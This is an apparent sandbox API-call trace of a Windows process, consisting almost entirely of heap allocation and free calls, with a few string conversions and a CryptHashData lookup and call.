RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0267.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.613] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0267.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0267.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0267.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55078 [0267.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0267.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0267.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0267.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0267.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0267.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0267.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0267.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0267.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0267.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0267.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0267.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0267.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0267.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0267.614] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0267.614] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0267.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0267.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0267.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0267.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0267.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0267.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0267.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0267.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0267.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0267.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0267.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0267.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0267.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f08 [0267.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0267.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0267.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0267.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0267.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0267.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0267.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0267.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0267.615] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55098 [0267.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0267.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0267.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0267.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0267.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0267.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0267.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0267.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0267.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.616] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0267.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0267.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0267.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0267.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0267.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0267.616] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0267.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0267.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0267.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0267.616] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.616] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0267.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0267.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0267.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0267.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0267.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0267.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0267.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0267.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0267.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0267.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0267.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0267.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0267.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0267.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0267.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0267.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0267.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0267.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0267.617] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0267.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0267.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0267.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0267.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0267.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0267.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0267.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0267.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0267.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0267.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0267.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0267.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0267.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0267.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0267.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0267.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0267.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0267.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0267.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0267.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0267.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0267.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0267.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0267.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0267.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0267.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0267.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0267.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0267.620] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0267.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0267.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0267.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0267.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0267.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0267.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0267.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0267.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0267.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0267.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0267.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0267.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0267.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0267.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0267.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0267.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0267.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0267.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0267.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0267.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0267.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0267.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0267.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0267.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0267.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0267.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0267.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0267.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0267.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51c40 [0267.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51c40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0267.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0267.622] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0267.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0267.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0267.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0267.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0267.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0267.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0267.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0267.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0267.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0267.623] CryptHashData (hHash=0xa87510, pbData=0x2e55078, dwDataLen=0x3, dwFlags=0x1) returned 1 [0267.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f155c8 [0267.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0267.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0267.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0267.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0267.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0267.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0267.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0267.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0267.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0267.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0267.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0267.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0267.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0267.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0267.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0267.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0267.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 